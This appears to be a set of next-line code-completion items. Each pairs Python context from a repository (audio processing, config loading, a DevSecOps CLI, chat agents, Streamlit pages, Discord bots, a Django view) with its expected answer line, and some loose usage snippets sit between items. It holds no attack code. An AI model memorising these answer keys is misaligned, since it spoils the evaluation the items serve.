NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: gerlaxrex/parrot
# Path: parrot1/utils/file_utils.py
def get_extension(filename: Union[str, os.PathLike]) -> str:
return os.path.basename(filename).rsplit(".", 1)[1]
# Path: parrot1/audio/utils/silence.py
def split_on_silence(
segment: pydub.AudioSegment,
min_silence_len: int = 1000,
silence_thresh: int = -16,
padding: int | bool = 100,
seek_step: int = 1,
) -> tuple[list[pydub.AudioSegment], list[tuple[float, float]]]:
"""It splits an audio segment on silent sections
Parameters
----------
segment
The original audio segment
min_silence_len
The minimum length of silence in millis for a split
silence_thresh
The silence threshold in dBFS
padding
The amount of silence, in millis, that chunks should be padded with
It keeps the audio segments from sounding abruptly cut off
seek_step
The step size in millis for iterating over the segment
Returns
-------
The audio chunks and split ranges in millis
"""
T = len(segment)
if isinstance(padding, bool):
padding = T if padding else 0
R = deque(detect_nonsilent(segment, min_silence_len, silence_thresh, seek_step))
Q = []
while R:
x = R.popleft()
s = max(x[0] - padding, 0)
e = min(x[1] + padding, T)
x = (s, e)
# It merges overlapping padding
if Q and s < Q[-1][1]:
s = Q[-1][0]
e = max(Q[-1][1], e)
Q[-1] = (s, e)
continue
Q.append(x)
return [segment[s:e] for s, e in Q], Q
# Path: parrot1/audio/extraction/audio_extraction.py
import logging
import os
from typing import List, Union
from pydub import AudioSegment
from tqdm import tqdm
from parrot1.utils.file_utils import get_extension
from parrot1.audio.utils.silence import split_on_silence
__logger = logging.getLogger(__name__)
def get_audio_from_video(video_filename: Union[str, os.PathLike]) -> AudioSegment:
"""
Takes the audio from the video file
:param video_filename: (Union[str, os.PathLike]) path to the video
:return: (AudioSegment) the extracted audio segment
"""
if not os.path.exists(video_filename):
raise FileNotFoundError(f"File at {video_filename} does not exists.")
| audio = AudioSegment.from_file(video_filename, format=get_extension(video_filename)) |
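A usage sketch for the split_on_silence helper imported above; the file name and thresholds are placeholders:
from pydub import AudioSegment

segment = AudioSegment.from_file("meeting.wav")       # hypothetical input file
chunks, ranges = split_on_silence(
    segment,
    min_silence_len=700,                  # require at least 0.7 s of silence to split
    silence_thresh=segment.dBFS - 16,     # threshold relative to the average loudness
    padding=150,                          # keep 150 ms of context around each chunk
)
for (start_ms, end_ms), chunk in zip(ranges, chunks):
    print(start_ms, end_ms, len(chunk))   # len() of a segment is its duration in ms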
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: chenaoxuan/UsfUtils
# Path: usfutils/dist.py
def master_only(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
rank, _ = get_dist_info()
if rank == 0:
return func(*args, **kwargs)
return wrapper
# Path: usfutils/time.py
def get_time_asc() -> str:
"""
e.g. 'Sat Jun 06 16:26:11 1998'.
:return:
"""
return time.asctime()
# Path: usfutils/dict.py
class UsfDict(dict):
def __init__(self, d: dict = None, **kwargs):
super().__init__()
if d is None:
d = dict(kwargs)
else:
d.update(**kwargs)
for k, v in d.items():
setattr(self, k, v)
# Class attributes
for k in self.__class__.__dict__.keys():
if not (k.startswith('__') and k.endswith('__')) and not k in ('update', 'pop'):
setattr(self, k, getattr(self, k))
def __setattr__(self, name, value):
if isinstance(value, (list, tuple)):
value = [self.__class__(x)
if isinstance(x, dict) else x for x in value]
elif isinstance(value, dict) and not isinstance(value, UsfDict):
value = UsfDict(value)
super(UsfDict, self).__setitem__(name, value)
__setitem__ = __setattr__
def __getattr__(self, name):
try:
return self[name]
except KeyError:
raise AttributeError(name)
def update(self, e: Union['UsfDict', dict, argparse.Namespace] = None, verbose=True, **kwargs):
d = e or dict()
if isinstance(d, argparse.Namespace):
d = vars(d)
d.update(kwargs)
output_msg = []
for k in d:
v = self.get(k, None)
if v is not None and (not isinstance(v, type(d[k])) or v != d[k]):
output_msg.append(str(k))
setattr(self, k, d[k])
if verbose and len(output_msg):
print(f"{output_msg} in UsfDict has been modified!")
def pop(self, k, d=None):
delattr(self, k)
return super(UsfDict, self).pop(k, d)
# Path: usfutils/config.py
import io
import os
import sys
import yaml
from shutil import copyfile
from typing import Union
from .dist import master_only
from .time import get_time_asc
from .dict import UsfDict
__all__ = [
'load_yaml',
'dict_to_yaml',
'copy_opt_file'
]
| def load_yaml(path: str) -> UsfDict: |
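Before load_yaml is filled in, a short illustration of the UsfDict it returns: nested plain dicts are converted recursively, so values are reachable by attribute or by key. All values here are invented:
cfg = UsfDict({"model": {"name": "resnet", "layers": [1, 2]}})
print(cfg.model.name)            # 'resnet' -- attribute access
print(cfg["model"]["layers"])    # [1, 2]  -- ordinary dict access still works
cfg.update({"model": {"name": "vit"}})   # prints a note that 'model' was modified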
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: ErdemOzgen/DevSecOpsBuilder
# Path: devsecopsbuilder/pipeline_executer.py
def load_configuration(filepath):
def create_output_directory(directory):
def install_tools(tools):
def update_tools(tools):
def run_command(step, output_dir, **kwargs):
def execute_post_command(step, **kwargs):
def get_output_file_path(output_dir, step_name):
def execute_command(command):
def save_command_output(result, output_file, step_name, command):
def get_repository_languages(repository_path):
def main():
# Path: devsecopsbuilder/convert_graph.py
def create_workflow_graph(steps):
def parse_yaml_and_create_graph(file_path):
G = nx.DiGraph()
# Path: devsecopsbuilder/convert_pipeline.py
def generate_jenkinsfile(yaml_path, jenkinsfile_path):
def write_step(jfile, step):
# Path: devsecopsbuilder/generate_report.py
def get_file_path(base_dir, scan_type, file_name):
def process_json_data(file_path, heading_title, item_processor, data_tag, addHeader=True, giveInfo=True): # noqa: E501
def bandit_item_processor(item):
def grype_item_processor(item):
def safety_item_processor(item):
def secret_item_processor(result):
def sbom_item_processor(component):
def bandit_results(bandit_file_path):
def grype_results(grype_file_path):
def safety_info(safety_file_path):
def safety_scanned_packages(item):
def safety_results(safety_file_path):
def secret_results(secret_file_path):
def process_secrets(item):
def sbom_results(sbom_file_path):
def generate_pdf(output_filename, **scan_files): # noqa: E501
def find_file_by_keyword(base_dir, scan_type, keyword):
def find_and_generate_report(base_dir, scan_type, output_filename):
# Path: devsecopsbuilder/asciiart.py
def print_ascii_art():
# Path: main.py
import argparse
import networkx as nx
import matplotlib.pyplot as plt
from devsecopsbuilder import pipeline_executer
from devsecopsbuilder import convert_graph
from devsecopsbuilder import convert_pipeline
from devsecopsbuilder import generate_report # noqa: F401
from devsecopsbuilder import asciiart
def main():
parser = argparse.ArgumentParser(description="Pipeline Execution Script")
parser.add_argument("--install", action="store_true", help="Install tools")
parser.add_argument("--update", action="store_true", help="Update tools")
parser.add_argument(
"--execute", action="store_true", help="Execute commands from playbook"
)
parser.add_argument(
"--config",
default="./playbooks/playbook.yaml",
help="Path to configuration file (optional)",
)
parser.add_argument(
"--output_dir",
default="command_outputs/outputs",
help="Path to output directory (optional)",
)
parser.add_argument(
"--tools_config",
default="./tools/tools.yaml",
help="Path to tools configuration file (optional)",
)
parser.add_argument(
"--report",
action="store_true",
help="Generates a report of the results of playbooks",
)
parser.add_argument(
"--generate_graph",
action="store_true",
help="Generate graph of defined yaml workflow",
)
parser.add_argument(
"--graph_yaml",
default="./playbooks/playbook.yaml",
help="Path to yaml file for generating graph (optional)",
)
parser.add_argument(
"--graph_output_dir",
default="command_outputs/graphs/graph.png",
help="Path to graph output directory (optional)",
)
parser.add_argument(
"--convert_pipeline", action="store_true", help="Convert yaml to pipeline" # noqa: E501
)
parser.add_argument(
"--pipeline_yaml",
default="./playbooks/playbook.yaml",
help="Path to workflow yaml file to pipeline (optional)",
)
parser.add_argument(
"--pipeline_output_dir",
default="command_outputs/jenkinsFiles/Jenkinsfile",
help="Path to pipeline output directory (optional)",
)
args = parser.parse_args()
# Check if no actionable arguments were provided
actionable_args = [
args.install,
args.update,
args.execute,
args.report,
args.generate_graph,
args.convert_pipeline,
]
if not any(actionable_args):
asciiart.print_ascii_art()
parser.print_help()
return
# Load configuration from specified or default path
config = pipeline_executer.load_configuration(args.config)
# Create specified or default output directory
pipeline_executer.create_output_directory(args.output_dir)
# Define default paths and other variables as a dictionary
default_variables = {
# Default variable values go here
}
if args.install or args.update:
# Load tool configuration from the YAML file
tools_config = pipeline_executer.load_configuration(args.tools_config)
all_tools = tools_config["tools_to_install"]["tools"]
default_tools = [tool for tool in all_tools if tool.get("default", False)] # noqa: E501
# Assuming 'tools' is the relevant section in the configuration for install/update # noqa: E501
# tools = config.get("tools", [])
if args.install:
# Install tools
pipeline_executer.install_tools(default_tools)
elif args.update:
# Update tools
pipeline_executer.update_tools(default_tools)
if args.execute:
# Execute configured commands
commands_to_run = config.get("commands_to_run", {}).get("steps", [])
for step in commands_to_run:
if isinstance(step, dict):
# Update default variables with step-specific ones if they exist # noqa: E501
step_variables = {**default_variables, **step.get("parameters", {})} # noqa: E501
pipeline_executer.run_command(step, args.output_dir, **step_variables) # noqa: E501
else:
print(f"Invalid step format: {step}")
if args.generate_graph:
try:
| workflow_graph = convert_graph.parse_yaml_and_create_graph(args.graph_yaml) # noqa: E501 |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: doodledood/chat-flock
# Path: chatflock/base.py
class ActiveChatParticipant(ChatParticipant):
symbol: str
messages_hidden: bool = False
def __init__(self, name: str, symbol: str = "👤", messages_hidden: bool = False):
super().__init__(name=name)
self.symbol = symbol
self.messages_hidden = messages_hidden
@abc.abstractmethod
def respond_to_chat(self, chat: "Chat") -> str:
raise NotImplementedError()
def __str__(self) -> str:
return f"{self.symbol} {self.name}"
def detailed_str(self, level: int = 0) -> str:
prefix = " " * level
return f"{prefix}- Name: {self.name}\n{prefix} Symbol: {self.symbol}"
# Path: chatflock/base.py
class Chat:
backing_store: ChatDataBackingStore
renderer: ChatRenderer
name: Optional[str] = None
max_total_messages: Optional[int] = None
hide_messages: bool = False
def __init__(
self,
backing_store: ChatDataBackingStore,
renderer: ChatRenderer,
initial_participants: Optional[Sequence[ChatParticipant]] = None,
name: Optional[str] = None,
max_total_messages: Optional[int] = None,
hide_messages: bool = False,
):
if max_total_messages is not None and max_total_messages <= 0:
raise ValueError("Max total messages must be None or greater than 0.")
self.backing_store = backing_store
self.renderer = renderer
self.name = name
self.hide_messages = hide_messages
self.max_total_messages = max_total_messages
for participant in initial_participants or []:
self.add_participant(participant)
def add_participant(self, participant: ChatParticipant) -> None:
if self.has_active_participant_with_name(participant.name) or self.has_non_active_participant_with_name(
participant.name
):
raise ChatParticipantAlreadyJoinedToChatError(participant.name)
self.backing_store.add_participant(participant)
all_participants = (
self.backing_store.get_active_participants() + self.backing_store.get_non_active_participants()
)
# Notify every participant that the newly added participant joined
for other_participant in all_participants:
other_participant.on_participant_joined_chat(chat=self, participant=participant)
def remove_participant(self, participant: ChatParticipant) -> None:
self.backing_store.remove_participant(participant)
active_participants = self.backing_store.get_active_participants()
non_active_participants = self.backing_store.get_non_active_participants()
all_participants = active_participants + non_active_participants
# Notify every remaining participant that the removed participant left
for remaining_participant in all_participants:
remaining_participant.on_participant_left_chat(chat=self, participant=participant)
def add_message(self, sender_name: str, content: str) -> None:
sender = self.backing_store.get_active_participant_by_name(sender_name)
if sender is None:
raise ChatParticipantNotJoinedToChatError(sender_name)
message = self.backing_store.add_message(sender_name=sender_name, content=content)
self.renderer.render_new_chat_message(chat=self, message=message)
active_participants = self.backing_store.get_active_participants()
non_active_participants = self.backing_store.get_non_active_participants()
all_participants = active_participants + non_active_participants
for participant in all_participants:
participant.on_new_chat_message(chat=self, message=message)
def get_messages(self) -> List[ChatMessage]:
return self.backing_store.get_messages()
def clear_messages(self):
self.backing_store.clear_messages()
def get_active_participants(self) -> List[ActiveChatParticipant]:
return self.backing_store.get_active_participants()
def get_non_active_participants(self) -> List[ChatParticipant]:
return self.backing_store.get_non_active_participants()
def get_active_participant_by_name(self, name: str) -> Optional[ActiveChatParticipant]:
return self.backing_store.get_active_participant_by_name(name=name)
def get_non_active_participant_by_name(self, name: str) -> Optional[ChatParticipant]:
return self.backing_store.get_non_active_participant_by_name(name=name)
def has_active_participant_with_name(self, participant_name: str) -> bool:
return self.backing_store.has_active_participant_with_name(participant_name=participant_name)
def has_non_active_participant_with_name(self, participant_name: str) -> bool:
return self.backing_store.has_non_active_participant_with_name(participant_name=participant_name)
@property
def active_participants_str(self):
return "\n\n".join([participant.detailed_str() for participant in self.get_active_participants()])
# Path: chatflock/participants/user.py
from typing import Any
from chatflock.base import ActiveChatParticipant, Chat
class UserChatParticipant(ActiveChatParticipant):
def __init__(self, name: str = "User", role: str = "User", symbol: str = "👤", **kwargs: Any):
super().__init__(name, messages_hidden=True, **kwargs)
self.role = role
self.symbol = symbol
| def respond_to_chat(self, chat: Chat) -> str: |
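The UserChatParticipant above is one concrete ActiveChatParticipant; any subclass only has to implement respond_to_chat. A hedged sketch using just the surface shown in this file; EchoParticipant is an invented name, and messages are assumed to expose a .content attribute:
class EchoParticipant(ActiveChatParticipant):
    def __init__(self) -> None:
        super().__init__(name="Echo", symbol="🔁")

    def respond_to_chat(self, chat: Chat) -> str:
        messages = chat.get_messages()
        # Repeat the latest message back, or greet an empty chat.
        return messages[-1].content if messages else "Hello!"

print(EchoParticipant().detailed_str())  # - Name: Echo / Symbol: 🔁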
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: phidatahq/junior-de
# Path: app/openai_key.py
def get_openai_key() -> Optional[str]:
"""Sidebar component to get OpenAI API key"""
# Get OpenAI API key from environment variable
openai_key: Optional[str] = getenv("OPENAI_API_KEY")
# If not found, get it from user input
if openai_key is None or openai_key == "" or openai_key == "sk-***":
api_key = st.sidebar.text_input("OpenAI API key", placeholder="sk-***", key="api_key")
if api_key != "sk-***" or api_key != "" or api_key is not None:
openai_key = api_key
# Store it in session state and environment variable
if openai_key is not None and openai_key != "":
st.session_state["OPENAI_API_KEY"] = openai_key
environ["OPENAI_API_KEY"] = openai_key
return openai_key
# Path: app/password.py
def check_password() -> bool:
"""Component to checks if a password entered by the user is correct.
To use this component, set the environment variable `APP_PASSWORD`.
Returns:
bool: `True` if the user had the correct password.
"""
app_password = getenv("APP_PASSWORD")
if app_password is None:
return True
def check_first_run_password():
"""Checks whether a password entered on the first run is correct."""
if "first_run_password" in st.session_state:
password_to_check = st.session_state["first_run_password"]
if password_to_check == app_password:
st.session_state["password_correct"] = True
# don't store password
del st.session_state["first_run_password"]
else:
st.session_state["password_correct"] = False
def check_updated_password():
"""Checks whether an updated password is correct."""
if "updated_password" in st.session_state:
password_to_check = st.session_state["updated_password"]
if password_to_check == app_password:
st.session_state["password_correct"] = True
# don't store password
del st.session_state["updated_password"]
else:
st.session_state["password_correct"] = False
# First run, show input for password.
if "password_correct" not in st.session_state:
st.text_input(
"Password",
type="password",
on_change=check_first_run_password,
key="first_run_password",
)
return False
# Password incorrect, show input for updated password + error.
elif not st.session_state["password_correct"]:
st.text_input(
"Password",
type="password",
on_change=check_updated_password,
key="updated_password",
)
st.error("😕 Password incorrect")
return False
# Password correct.
else:
return True
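A minimal usage sketch for this component, assuming `APP_PASSWORD` is exported in the environment and the code runs inside a Streamlit page (the title text is illustrative):

import streamlit as st
from app.password import check_password

if check_password():
    st.title("Protected page")  # rendered only once the correct password is entered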
# Path: app/reload.py
def reload_button():
"""Sidebar component to show reload button"""
st.sidebar.markdown("---")
if st.sidebar.button("Reload Session"):
st.session_state.clear()
st.rerun()
# Path: app/user_name.py
def get_user_name() -> Optional[str]:
"""Sidebar component to get username"""
# Get user_name from user if not in session state
if "user_name" not in st.session_state:
username_input_container = st.sidebar.empty()
username = username_input_container.text_input(":technologist: Enter username")
if username != "":
st.session_state["user_name"] = username
username_input_container.empty()
# Get user_name from session state
user_name = st.session_state.get("user_name")
return user_name
# Path: duckgpt/s3_tables.py
def load_s3_tables(duckdb_tools: DuckDbTools) -> None:
"""Load S3 tables to DuckDB"""
for table in s3_tables:
duckdb_tools.create_table_from_path(path=table.path, table=table.name)
logger.info(f"Created table: {table.name}")
# Path: llm/conversations/duckgpt_s3.py
def get_duckgpt_s3_conversation(
user_name: Optional[str] = None,
conversation_id: Optional[str] = None,
debug_mode: bool = False,
) -> Conversation:
# Path: utils/log.py
def build_logger(logger_name: str) -> logging.Logger:
# Path: app/pages/3_DuckGPT_S3.py
from typing import List
from phi.conversation import Conversation
from app.openai_key import get_openai_key
from app.password import check_password
from app.reload import reload_button
from app.user_name import get_user_name
from duckgpt.s3_tables import load_s3_tables
from llm.conversations.duckgpt_s3 import duckdb_s3_tools, get_duckgpt_s3_conversation
from utils.log import logger
import streamlit as st
st.title(":snowman: DuckGPT")
st.markdown('<a href="https://github.com/phidatahq/phidata"><h4>by phidata</h4></a>', unsafe_allow_html=True)
def restart_conversation():
st.session_state["s3_conversation"] = None
st.session_state["s3_conversation_id"] = None
st.rerun()
def main() -> None:
# Get users OpenAI API key
get_openai_key()
# Get user name
| user_name = get_user_name() |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: YoungJooHan/NM-FlowGAN
# Path: util/util.py
def tensor2np(t:torch.Tensor):
'''
Transform a torch Tensor into a numpy array in OpenCV image form.
RGB -> BGR
(c,h,w) -> (h,w,c)
'''
t = t.cpu().detach()
# gray
if len(t.shape) == 2:
return t.numpy()
# RGB -> BGR
elif len(t.shape) == 3:
return np.flip(t.permute(1,2,0).numpy(), axis=2)
# image batch
elif len(t.shape) == 4:
return np.flip(t.permute(0,2,3,1).numpy(), axis=3)
else:
raise RuntimeError('wrong tensor dimensions : %s'%(t.shape,))
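A quick shape sanity check of the conversion described in the docstring (values are illustrative):

import torch
t = torch.rand(3, 8, 8)   # (c, h, w), RGB channel order
img = tensor2np(t)        # -> (8, 8, 3), BGR channel order
assert img.shape == (8, 8, 3)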
# Path: util/util.py
def save_img(dir_name, file_name, img):
path = os.path.join(dir_name, file_name)
if 'raw' in path[-3:]:
os.makedirs(dir_name, exist_ok=True)
with open(path, 'w') as fid:
img.tofile(fid)
else:
if len(img.shape) == 3 and img.shape[-1] != 3 and img.shape[-1] > 1:
cv2.imwritemulti(path, img.transpose([2,0,1])) # multi stack image, convert to CHW
elif len(img.shape) == 4 and img.shape[0] > 1: # batch image, only grey image is available
img = img.squeeze(-1)
cv2.imwritemulti(path, img)
elif len(img.shape) == 4 and img.shape[0] <= 1: # single batch image
img = img.squeeze(0)
cv2.imwrite(path, img)
else:
cv2.imwrite(path, img)
# Path: util/file_manager.py
import os
import cv2
import numpy as np
import torch
from .util import tensor2np, save_img
class FileManager:
def __init__(self, session_name, output_path=None):
if output_path is None:
self.output_folder = "./output"
else:
self.output_folder = output_path
if not os.path.isdir(self.output_folder):
os.makedirs(self.output_folder)
print("[WARNING] output folder is not exist, create new one")
# init session
self.session_name = session_name
os.makedirs(os.path.join(self.output_folder, self.session_name), exist_ok=True)
# mkdir
for directory in ['checkpoint', 'img']:
self.make_dir(directory)
def is_dir_exist(self, dir_name:str) -> bool:
return os.path.isdir(os.path.join(self.output_folder, self.session_name, dir_name))
def make_dir(self, dir_name:str) -> None:
os.makedirs(os.path.join(self.output_folder, self.session_name, dir_name), exist_ok=True)
def get_dir(self, dir_name:str) -> str:
# -> './output/<session_name>/dir_name'
return os.path.join(self.output_folder, self.session_name, dir_name)
def save_img_tensor(self, dir_name:str, file_name:str, img:torch.Tensor, ext='png'):
self.save_img_numpy(dir_name, file_name, tensor2np(img), ext)
def save_img_numpy(self, dir_name:str, file_name:str, img:np.array, ext='png'):
if np.shape(img)[2] == 1:
| save_img(self.get_dir(dir_name), '%s.%s'%(file_name, ext), np.squeeze(img, 2)) |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: VCasecnikovs/RAGAgainstTheMachine
# Path: chatting.py
def chat_inference(
messages: list[ChatMessage],
client: OpenAI,
model="gpt-4-1106-preview",
):
formatted_messages = []
for message in messages:
formatted_messages.append(
{
"role": message.role,
"content": message.content,
}
)
completion = client.chat.completions.create(
response_format={"type": "json_object"},
model=model,
messages=[
*formatted_messages,
],
)
model_answer = completion.choices[0].message.content
return model_answer
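A hedged call sketch; note that OpenAI's JSON response format requires the word "JSON" to appear somewhere in the messages:

client = get_openAI_client()
answer = chat_inference(
    [ChatMessage(role=Role.USER, content="Reply with an empty JSON object.")],
    client,
)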
# Path: chatting.py
class ChatMessage(BaseModel):
role: Role
content: str
# Path: chatting.py
def get_openAI_client():
load_dotenv()
client = OpenAI()
return client
# Path: chatting.py
class Role(str, Enum):
SYSTEM = "system"
USER = "user"
ASSISTANT = "assistant"
# Path: sourcing.py
import requests
import os
import json
from dotenv import load_dotenv
from newspaper import Article
from chatting import chat_inference, ChatMessage, get_openAI_client, Role
YOU_HEADERS = {"X-API-Key": os.environ.get("YOUCOM_API_KEY", "")}
def _get_you_search_impl(
query: str, page_index: int = 0, limit: int = 20, country: str = ""
):
url = "https://api.ydc-index.io/search"
query_args = {"query": query}
if page_index:
query_args["offset"] = page_index
if limit:
query_args["count"] = limit
if country:
query_args["country"] = country
response = requests.request("GET", url, headers=YOU_HEADERS, params=query_args)
results = []
for line in response.json()["hits"]:
snippets = " ".join(line["snippets"])
description = ". ".join([line["title"], snippets])
results.append(
{
"url": line["url"],
"title": line["title"],
"text": description,
}
)
return results
def _get_you_news_impl(
query: str, page_index: int = 0, limit: int = 20, country: str = ""
):
url = "https://api.ydc-index.io/news"
query_args = {"q": query}
if page_index:
query_args["offset"] = page_index
if limit:
query_args["count"] = limit
if country:
query_args["country"] = country
response = requests.request("GET", url, headers=YOU_HEADERS, params=query_args)
results = []
for line in response.json()["news"]["results"]:
results.append(
{"url": line["url"], "title": line["title"], "text": line["description"]}
)
return results
def get_you_search(query: str):
# TODO: pass the page here somehow
return _get_you_search_impl(query, page_index=0, country="")
def get_you_news(query: str):
# TODO: pass the page here somehow
results = []
for _ in range(1):
results.extend(_get_you_news_impl(query, page_index=0, country=""))
return results
def _get_newsapi_impl(
query: str, page_index: int = 0, limit: int = 20
):
url = "https://newsapi.org/v2/everything"
query_args = {
"q": query,
"apiKey": os.environ.get("NEWSAPI_API_KEY")
}
if page_index:
query_args["page"] = page_index+1
if limit:
query_args["pageSize"] = limit
response = requests.request("GET", url, params=query_args)
results = []
for line in response.json()["articles"]:
results.append(
{"url": line["url"], "title": line["title"], "text": line["description"] + " " + line["content"]}
)
return results
def get_newsapi_news(query: str):
results = []
for _ in range(1):
results.extend(_get_newsapi_impl(query, page_index=0))
return results
SOURCES = {
"you_news": get_you_news,
# "you_search": get_you_search,
# "news_api": get_newsapi_news,
}
def get_page_text(url: str) -> str:
try:
article = Article(url)
article.download()
article.parse()
return article.text
except Exception:
return ""
def scrape_data(articles_data: list[dict]):
for article in articles_data:
parsed_text = get_page_text(article["url"])
if parsed_text:
article["text"] = article["text"] + " ." + parsed_text
def filter_urls(urls):
| client = get_openAI_client() |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: TimeEnjoyed/TimeBot
# Path: core/config.py
# Path: core/constants.py
MBTI_TYPES: list[str] = [
"ESTP",
"ESTJ",
"ESFP",
"ESFJ",
"ISTP",
"ISTJ",
"ISFP",
"ISFJ",
"ENFJ",
"ENTP",
"ENFP",
"ENTJ",
"INTP",
"INFJ",
"INTJ",
"INFP",
]
# Path: core/bots.py
import asyncio
import json
import logging
import pathlib
import aiohttp
import discord
import twitchio
import wavelink
from typing import TYPE_CHECKING
from urllib.parse import quote
from discord.ext import commands
from twitchio.ext import commands as tcommands
from .config import config
from .constants import MBTI_TYPES
from collections.abc import Sequence
from typing import Any
from database import Database
if TYPE_CHECKING:
logger: logging.Logger = logging.getLogger(__name__)
LIVE_ROLE_ID: int = 1182206699969458226
SUBBED_ROLE_ID: int = 873044115279990836
class DiscordBot(commands.Bot):
tbot: TwitchBot
def __init__(self, *, database: Database) -> None:
self.database = database
intents: discord.Intents = discord.Intents.default()
intents.message_content = True
intents.members = True
intents.presences = True
self.loaded: bool = False
super().__init__(intents=intents, command_prefix=config["DISCORD"]["prefix"])
async def on_ready(self) -> None:
if self.loaded:
return
self.loaded = True
assert self.user
logger.info(f"Logged into Discord as {self.user} | {self.user.id}")
if config["DEBUG"]["enabled"] is True:
return
guild: discord.Guild = self.get_guild(859565527343955998) # type: ignore
role: discord.Role = guild.get_role(LIVE_ROLE_ID) # type: ignore
subbed: discord.Role = guild.get_role(SUBBED_ROLE_ID) # type: ignore
for member in guild.members:
if subbed not in member.roles:
continue
streaming = False
for activity in member.activities:
if isinstance(activity, discord.Streaming) and str(activity.platform).lower() == "twitch":
streaming = True
if streaming and role not in member.roles:
await member.add_roles(role)
await asyncio.sleep(1)
elif not streaming and role in member.roles:
await member.remove_roles(role)
await asyncio.sleep(1)
logger.info("Finished updating roles in on_ready event.")
async def setup_hook(self) -> None:
node: wavelink.Node = wavelink.Node(uri=config["WAVELINK"]["uri"], password=config["WAVELINK"]["password"])
await wavelink.Pool.connect(nodes=[node], client=self, cache_capacity=100)
location = ("extensions/discord", "extensions.discord")
extensions: list[str] = [f"{location[1]}.{f.stem}" for f in pathlib.Path(location[0]).glob("*.py")]
for extension in extensions:
await self.load_extension(extension)
logger.info("Loaded extensions for Discord Bot.")
async def on_wavelink_node_ready(self, payload: wavelink.NodeReadyEventPayload) -> None:
node: wavelink.Node = payload.node
logger.info("Wavelink successfully connected: %s. Resumed: %s", node.identifier, payload.resumed)
async def on_command_error(self, context: commands.Context, exception: commands.CommandError) -> None:
if isinstance(exception, commands.CommandNotFound):
return
logger.exception(exception)
async def on_presence_update(self, before: discord.Member, after: discord.Member) -> None:
if config["DEBUG"]["enabled"] is True:
return
if before.guild.id != 859565527343955998:
return
subbed: discord.Role | None = after.guild.get_role(SUBBED_ROLE_ID)
if subbed not in after.roles:
return
bstream: discord.Streaming | None = None
astream: discord.Streaming | None = None
for activity in before.activities:
if isinstance(activity, discord.Streaming) and str(activity.platform).lower() == "twitch":
bstream = activity
for activity in after.activities:
if isinstance(activity, discord.Streaming) and str(activity.platform).lower() == "twitch":
astream = activity
if bstream is not None and astream is not None:
return
role: discord.Role = before.guild.get_role(LIVE_ROLE_ID) # type: ignore
if not bstream and astream and role not in before.roles:
await before.add_roles(role, reason="Started streaming on Twitch")
elif not astream and bstream and role in after.roles:
await after.remove_roles(role, reason="Stopped streaming on Twitch")
def mbti_count(self) -> dict[str, int]:
guild: discord.Guild | None = self.get_guild(859565527343955998)
assert guild is not None
roles: Sequence[discord.Role] = guild.roles
| mbti_dict: dict[str, int] = dict.fromkeys(MBTI_TYPES, 0) |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: henriquesebastiao/poupy
# Path: project/apps/app/forms.py
class TransferForm(forms.Form):
"""Form used to transfer money between accounts."""
description = forms.CharField(
label='Description',
widget=forms.TextInput(
attrs={'placeholder': 'Insert the description of transaction'}
),
)
account_origin = forms.ModelChoiceField(
queryset=Account.objects.all(),
label='Source account',
widget=forms.Select(),
)
account_destination = forms.ModelChoiceField(
queryset=Account.objects.all(),
label='Target account',
widget=forms.Select(),
)
value = forms.DecimalField(
label='Value',
widget=forms.NumberInput(
attrs={'placeholder': 'Insert the value of transaction'}
),
)
def clean(self):
"""Validates that the account_origin and account_destination fields are not equal"""
cleaned_data = super().clean()
account_origin = cleaned_data.get('account_origin')
account_destination = cleaned_data.get('account_destination')
if account_origin == account_destination:
raise ValidationError(
{
'account_destination': 'Source account and target account must be different.'
}
)
value = cleaned_data.get('value')
if value is None or value <= 0:
raise ValidationError(
{'value': 'Value must be greater than zero.'}
)
# Path: project/apps/app/models.py
class Account(CommonInfo):
"""Model for the Account."""
name = models.CharField(max_length=55, null=False)
balance = models.DecimalField(
decimal_places=2,
null=False,
default=0.00,
max_digits=14,
validators=[MinValueValidator(Decimal('0.00'))],
)
def __str__(self):
return self.name
# Path: project/apps/app/models.py
class Transfer(CommonInfo, TransactionMixin):
"""Model for the Transfer."""
account_origin = models.ForeignKey(
Account, on_delete=models.CASCADE, related_name='account_origin'
)
account_destination = models.ForeignKey(
Account, on_delete=models.CASCADE, related_name='account_destination'
)
type = models.CharField(max_length=8, default='TRANSFER', null=False)
def __str__(self):
return self.description
# Path: project/apps/app/views/transfer.py
from django.contrib import messages
from django.contrib.auth.mixins import LoginRequiredMixin
from django.shortcuts import redirect
from django.views.generic import FormView
from ..forms import TransferForm
from ..models import Account, Transfer
"""Views for transfer app."""
class TransferView(LoginRequiredMixin, FormView):
"""Transfer view page."""
login_url = 'login'
template_name = 'pages/app/new_transfer.html'
| form_class = TransferForm |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: AuroraNemoia/yuusei
# Path: utils.py
def log(text, type="normal"):
types = {
"quiet": "\x1b[33;90m",
"warn": "\x1b[33;20m⚠️ WARN: ",
